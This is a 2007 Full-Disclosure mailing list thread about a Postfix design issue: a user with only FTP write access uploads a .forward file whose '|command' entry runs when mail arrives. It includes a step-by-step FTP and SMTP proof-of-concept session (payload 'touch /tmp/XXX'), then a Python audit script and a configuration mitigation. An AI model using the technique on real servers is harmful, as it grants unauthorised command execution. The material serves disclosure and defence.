No, the idea is that you are a user with no login access, only FTP. By doing this, you get shell access (with sane privileges, thankfully) when you're supposed to only have FTP.
On Dec 13, 2007 2:34 PM, Fredrick Diggle <[EMAIL PROTECTED]> wrote:
> You have write perms on a user's home directory and this was the best way
> you could come up with to execute commands? Please send me details on your
> recipe for boiled water. Be sure to gzip it though as I imagine it is
> several pages long.
>
> YAY!
>
>
> On Dec 13, 2007 2:18 PM, kcope <[EMAIL PROTECTED]> wrote:
>
> > Small Design Bug in Postfix - REMOTE
> >
> > There's a small issue on how Postfix forwards mails.
> > A user can have a .forward file in her home directory.
> > Inside this file she can specify an alternative recipient
> > or use aliasing to execute commands when mail is received.
> > From the manpage ALIASES(5)
> > "aliases - Postfix local alias database format"
> >
> >     |command
> >            Mail is piped into command. Commands that contain
> >            special characters, such as whitespace, should be
> >            enclosed between double quotes. See local(8) for
> >            details of delivery to command.
> >
> >            When the command fails, a limited amount of command
> >            output is mailed back to the sender. The file
> >            /usr/include/sysexits.h defines the expected exit
> >            status codes. For example, use "|exit 67" to simu-
> >            late a "user unknown" error, and "|exit 0" to
> >            implement an expensive black hole.
> >
> > This is fine since postfix properly drops privileges before
> > executing the command.
> > The Problem with executing commands via .forward files is that
> > if someone manages to place a file into one's home directory and
> > just sends a file to the mailserver she can execute commands
> > even when she's not supposed to or does not have the privileges.
> >
> > Here is an example exploitation session, the user 'rootkey'
> > only has ftp access with write permissions and no other privileges than
> > that.
> >
> > Login to FTP server
> > >telnet box 21
> > >USER rootkey
> > >PASS rootkey123
> > <logged in
> >
> > Put .forward file with following contents into the home directory of
> > user 'rootkey'.
> >
> > ---snip---
> > |touch /tmp/XXX
> > ---snip---
> >
> > >put .forward
> >
> > Now send an email to user rootkey.
> >
> > >telnet box 25
> > >mail from: rootkey
> > >rcpt to: rootkey
> > >data
> > >.
> >
> > RESULT:
> >
> > [EMAIL PROTECTED]:~$ ls /tmp/testXXX
> > /tmp/testXXX
> >
> >
> > signed,
> >
> > - -kcope/2007
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
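An audit for the condition discussed in this thread, as an added example that is not part of the original posts and not Postfix code: it lists every .forward destination that is a command, file or :include: delivery, and marks accounts whose shell denies interactive login. The parser is simplified, and the function names, the NOLOGIN shell list, the home-directory-named-after-user layout and the sample accounts are assumptions made for illustration.

```python
import os
import re
import tempfile

NOLOGIN = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}  # assumed list
_ENTRY = re.compile(r'\s*("(?:[^"\\]|\\.)*"|[^,]+)')

def parse_forward(text):
    """Split .forward text on commas/newlines; double quotes protect commas."""
    return [m.group(1).strip() for line in text.splitlines()
            for m in _ENTRY.finditer(line) if m.group(1).strip()]

def classify(entry):
    """Destination kinds per ALIASES(5): |command, /file, :include:, address."""
    e = entry.strip('"').lstrip()
    for prefix, kind in (("|", "command"), ("/", "file"), (":include:", "include")):
        if e.startswith(prefix):
            return kind
    return "address"

def audit(home_root, passwd_text):
    """Return (user, kind, entry, no_login_shell) for non-address destinations.
    Assumes each home directory under home_root is named after its user."""
    rows = (l.split(":") for l in passwd_text.splitlines())
    shells = {f[0]: f[6] for f in rows if len(f) >= 7}
    findings = []
    for user in sorted(os.listdir(home_root)):
        home = os.path.join(home_root, user)
        names = sorted(os.listdir(home)) if os.path.isdir(home) else []
        for name in names:
            path = os.path.join(home, name)
            # startswith also catches .forward+extension variants
            if not name.startswith(".forward") or not os.path.isfile(path):
                continue
            with open(path, errors="replace") as fh:
                for entry in parse_forward(fh.read()):
                    if classify(entry) != "address":
                        findings.append((user, classify(entry), entry,
                                         shells.get(user) in NOLOGIN))
    return findings

def demo():
    """Constructed sample: an FTP-only account and a normal shell account."""
    passwd = ("rootkey:x:1001:1001::/home/rootkey:/usr/sbin/nologin\n"
              "alice:x:1002:1002::/home/alice:/bin/bash\n")
    root = tempfile.mkdtemp()
    for user, body in (("rootkey", "|touch /tmp/XXX\n"),
                       ("alice", 'bob@example.org, "|/usr/bin/vacation alice"\n')):
        os.mkdir(os.path.join(root, user))
        with open(os.path.join(root, user, ".forward"), "w") as fh:
            fh.write(body)
    return audit(root, passwd)
```

A finding with the last field set to True is the case from the thread: command delivery configured for an account that is not meant to run commands. Postfix's `allow_mail_to_commands` parameter in main.cf (default `alias, forward`) can be set to `alias` so that local(8) no longer runs "|command" destinations from .forward files.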
